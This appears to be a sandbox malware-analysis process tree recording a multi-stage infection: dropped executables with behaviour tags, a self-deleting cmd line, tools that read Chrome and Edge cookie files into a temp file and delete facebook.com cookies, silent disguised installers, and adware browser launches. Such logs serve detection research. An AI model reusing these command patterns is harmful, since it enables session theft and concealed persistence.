C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1900 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4764 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6532 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5000 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5752 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1708 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6020 /prefetch:26⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6608 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5984 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4460 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4652 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2536 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3748 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6484 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7184 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7104 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7260 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7520 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7360 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7568 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8040 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7516 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7504 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7640 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3848 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1636 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7684 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.PageScreenshotProcessor --field-trial-handle=2188,6548852019474988220,13124048000645428084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8292 /prefetch:86⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 5968 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\h5Mf7fCP0iLoTpkZt0_ezgBy.exe"5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 59686⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 5968 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\h5Mf7fCP0iLoTpkZt0_ezgBy.exe"5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 59686⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\LvJ59gJxc3LSPWvaIC75WK3C.exe"C:\Users\Admin\Documents\LvJ59gJxc3LSPWvaIC75WK3C.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\S5JNKYGQ09fmPKqgYZFlX5Wl.exe"C:\Users\Admin\Documents\S5JNKYGQ09fmPKqgYZFlX5Wl.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 2444⤵
- Program crash
-
C:\Users\Admin\Documents\i51OEtivp64F1h3jriSb9179.exe"C:\Users\Admin\Documents\i51OEtivp64F1h3jriSb9179.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\i51OEtivp64F1h3jriSb9179.exeC:\Users\Admin\Documents\i51OEtivp64F1h3jriSb9179.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\yOpfFns9feXR1oA37BXrUSoj.exe"C:\Users\Admin\Documents\yOpfFns9feXR1oA37BXrUSoj.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\yOpfFns9feXR1oA37BXrUSoj.exe"C:\Users\Admin\Documents\yOpfFns9feXR1oA37BXrUSoj.exe"4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\bEYG8MCmwS_N0mgL9uYFs3Jb.exe"C:\Users\Admin\Documents\bEYG8MCmwS_N0mgL9uYFs3Jb.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\bEYG8MCmwS_N0mgL9uYFs3Jb.exe"C:\Users\Admin\Documents\bEYG8MCmwS_N0mgL9uYFs3Jb.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\bAGRnF23dqqSQc9GLsP_8f2i.exe"C:\Users\Admin\Documents\bAGRnF23dqqSQc9GLsP_8f2i.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\ZP8ROxtPgq7xzmkTnY1ILt2W.exe"C:\Users\Admin\Documents\ZP8ROxtPgq7xzmkTnY1ILt2W.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 3204⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\MsKeXpA3JCm5KJWAfbFTLe6p.exe"C:\Users\Admin\Documents\MsKeXpA3JCm5KJWAfbFTLe6p.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\bXB9E3wOjLBBoAzWOKy1jhXH.exe"C:\Users\Admin\Documents\bXB9E3wOjLBBoAzWOKy1jhXH.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5592 -s 2404⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\bFClUtu0XfsHUGnX6uO9BE2D.exe"C:\Users\Admin\Documents\bFClUtu0XfsHUGnX6uO9BE2D.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"4⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"5⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"5⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"5⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\Documents\KaN6V1t36aPvGbjwrCNT4frv.exe"C:\Users\Admin\Documents\KaN6V1t36aPvGbjwrCNT4frv.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5556 -s 3004⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\iHcz2PjFZ8e9IDvRcRQLV9o9.exe"C:\Users\Admin\Documents\iHcz2PjFZ8e9IDvRcRQLV9o9.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\iHcz2PjFZ8e9IDvRcRQLV9o9.exe"C:\Users\Admin\Documents\iHcz2PjFZ8e9IDvRcRQLV9o9.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\1cu20YjSd19Ml5gGnIdtbCyZ.exe"C:\Users\Admin\Documents\1cu20YjSd19Ml5gGnIdtbCyZ.exe"3⤵
-
C:\Users\Admin\Documents\1cu20YjSd19Ml5gGnIdtbCyZ.exe"C:\Users\Admin\Documents\1cu20YjSd19Ml5gGnIdtbCyZ.exe" -q4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\AGV_ZCjRSXUJEYPKIJWOth72.exe"C:\Users\Admin\Documents\AGV_ZCjRSXUJEYPKIJWOth72.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\8421129.exe"C:\Users\Admin\AppData\Roaming\8421129.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1400 -s 23405⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\3544711.exe"C:\Users\Admin\AppData\Roaming\3544711.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\X6pFteX1hujq71gAoddJIl03.exe"C:\Users\Admin\Documents\X6pFteX1hujq71gAoddJIl03.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-MTJJ2.tmp\X6pFteX1hujq71gAoddJIl03.tmp"C:\Users\Admin\AppData\Local\Temp\is-MTJJ2.tmp\X6pFteX1hujq71gAoddJIl03.tmp" /SL5="$202DC,138429,56832,C:\Users\Admin\Documents\X6pFteX1hujq71gAoddJIl03.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-AA40I.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-AA40I.tmp\Setup.exe" /Verysilent5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"7⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe"C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\1478644.exe"C:\Users\Admin\AppData\Roaming\1478644.exe"7⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4780 -s 23568⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\5605215.exe"C:\Users\Admin\AppData\Roaming\5605215.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\3153485.exe"C:\Users\Admin\AppData\Roaming\3153485.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\4881157.exe"C:\Users\Admin\AppData\Roaming\4881157.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 25488⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-MMVMB.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-MMVMB.tmp\MediaBurner2.tmp" /SL5="$3028C,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-V7FOR.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-V7FOR.tmp\3377047_logo_media.exe" /S /UID=burnerch28⤵
-
C:\Program Files\Microsoft Office 15\ATKMCPCBQB\ultramediaburner.exe"C:\Program Files\Microsoft Office 15\ATKMCPCBQB\ultramediaburner.exe" /VERYSILENT9⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-RJ7JP.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-RJ7JP.tmp\ultramediaburner.tmp" /SL5="$800AE,281924,62464,C:\Program Files\Microsoft Office 15\ATKMCPCBQB\ultramediaburner.exe" /VERYSILENT10⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu11⤵
-
C:\Users\Admin\AppData\Local\Temp\d2-de3b3-031-63687-a6b269a3643ce\Lishacidege.exe"C:\Users\Admin\AppData\Local\Temp\d2-de3b3-031-63687-a6b269a3643ce\Lishacidege.exe"9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e610⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9fdcb46f8,0x7ff9fdcb4708,0x7ff9fdcb471811⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad10⤵
-
